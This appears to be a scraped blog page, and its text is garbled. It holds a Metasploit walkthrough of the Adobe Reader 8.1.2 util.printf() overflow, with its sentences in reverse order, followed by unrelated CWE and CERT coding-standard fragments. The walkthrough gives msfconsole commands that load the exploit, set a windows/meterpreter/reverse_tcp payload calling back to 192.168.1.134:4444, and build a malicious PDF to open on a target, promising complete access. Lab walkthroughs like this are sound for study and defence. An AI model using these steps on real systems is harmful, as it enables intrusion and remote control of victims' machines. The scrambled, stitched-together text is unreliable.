![]() ![]() Then we need to copy it to the target machine (the one running the vulnerable version of Adobe PDF Reader) and open it. We can download the generated malicious PDF from the URI and save it on our hard drive as util_printf.pdf. At the end we’re executing the command exploitto run the configured actions. This IP will be used by the payload to connect back to us, creating a reverse meterpreter session, which will give us complete access to the compromised computer. These variables are PAYLOAD, which specifies the payload that will be executed upon successful execution of the exploit and LHOST, which sets the IP of our meterpreter computer. Then we’re setting some common Metasploit variables that are required for everything to work. Started reverse handler on 192.168.1.134:4444įirst we’re executing the command to use the adobe_utilprintf exploit. Msf exploit(adobe_utilprintf) > set LHOST 1 92.168.1.134 Msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp Msf > use exploit/windows/browser/adobe_utilprintf In order to do that we must download the Metasploit, start the msfconsole, and execute the commands below: Now we’ve come to the part where we need to test the Metasploit module. The right version of Adobe Reader is installed, which is the version 8.1.2. To do that, we can start the Adobe PDF Reader normally and click on Menu – Help – About Adobe Reader 8. When the installation process is complete, we can check whether the appropriate version was installed on the system. The installation process of the old vulnerable PDF Reader can be observed below: The vulnerable version of Adobe PDF Reader is 8.1.2 (including), which we need to download from the oldapps web page and install on the system. But which version do we need? Luckily the exploit for the util.printf() buffer overflow vulnerability can be found in the Metasploit modules as we can see oin the picture below: We need to search for a specific version of Adobe PDF Reader, which was vulnerable to the util.printf() buffer overflow vulnerability. ![]() Miscellaneous (MSC)The old version of PDF Reader can be found on various web pages, but most prominent web page is definitely oldapps. SEI CERT C Coding Standard - Guidelines 48. SEI CERT C Coding Standard - Guidelines 14. SEI CERT C Coding Standard - Guidelines 12. SEI CERT C Coding Standard - Guidelines 10. SEI CERT C Coding Standard - Guidelines 07. SFP Secondary Cluster: Use of an Improper API ![]() The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries). View - a subset of CWE entries that provides a way of examining CWE content. In addition, relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user may want to explore.Ĭategory - a CWE entry that contains a set of other entries that share a common characteristic.ĬERT C Secure Coding Standard (2008) Chapter 5 - Integers (INT)ĬERT C Secure Coding Standard (2008) Chapter 10 - Input Output (FIO)ĬERT C Secure Coding Standard (2008) Chapter 13 - Error Handling (ERR)ĬERT C++ Secure Coding Section 04 - Integers (INT)ĬERT C++ Secure Coding Section 09 - Input Output (FIO) These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to similar items that may exist at higher and lower levels of abstraction. This table shows the weaknesses and high level categories that are related to this weakness. Use of Path Manipulation Function without Maximum-sized Buffer Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource. That is linked to a certain type of product, typically involving a specific language or technology. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource. More specific than a Pillar Weakness, but more general than a Base Weakness. Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |